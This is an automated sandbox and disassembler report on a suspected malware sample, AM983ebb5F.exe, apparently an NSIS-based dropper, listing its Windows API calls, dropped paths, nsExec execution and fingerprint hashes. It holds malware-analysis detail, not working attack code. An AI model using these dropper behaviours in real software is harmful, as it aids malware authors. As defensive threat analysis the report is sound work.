                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp$C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\erstatningsgraden$ExecToStack
                                                                                    • API String ID: 1941528284-765737209
                                                                                    • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                    • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                    • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                    • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

                                                                                    Control-flow Graph (function at 004055DC; basic-block graph not reproduced here)
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                    • lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                    • lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                    • SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                    • String ID: antholite
                                                                                    • API String ID: 2531174081-3488562018
                                                                                    • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                    • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                                                    • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                                                    • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

                                                                                    Control-flow Graph (function at 004068DB; basic-block graph not reproduced here)
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                    • wsprintfW.USER32 ref: 0040692D
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                    • API String ID: 2200240437-1106614640
                                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                    • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                    • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

                                                                                    Control-flow Graph (function at 00406076; basic-block graph not reproduced here)
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00406094
                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-678247507
                                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                    • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                    • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

                                                                                    Control-flow Graph (function at 004015C6; basic-block graph not reproduced here)
                                                                                    APIs
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AM983ebb5F.exe"), ref: 00405EDF
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                      • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\erstatningsgraden,?,00000000,000000F0), ref: 00401652
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00401645
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                    • API String ID: 1892508949-1967000036
                                                                                    • Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                    • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                                                    • Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
                                                                                    • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

                                                                                    Control-flow Graph (function at 004020DD; basic-block graph not reproduced here)
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 334405425-0
                                                                                    • Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                    • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                                                                    • Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
                                                                                    • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD53D.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3356406503-0
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 004056BF
                                                                                      • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                    • CoUninitialize.COMBASE(00000404,00000000), ref: 0040570B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeMessageSendUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2896919175-0
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                    • GetLastError.KERNEL32 ref: 00405AFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnableShow
                                                                                    • String ID:
                                                                                    • API String ID: 1136574915-0
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abelsa",?), ref: 00405B63
                                                                                    • CloseHandle.KERNEL32(?,?,?, abelsa",?), ref: 00405B70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3712363035-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                      • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                      • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                      • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 0040604B
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                    • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                                                    • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                    • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                                                    APIs
                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileString
                                                                                    • String ID:
                                                                                    • API String ID: 1096422788-0
                                                                                    • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                    • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                                    • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                    • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,: Completed,?,00000000), ref: 004063E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
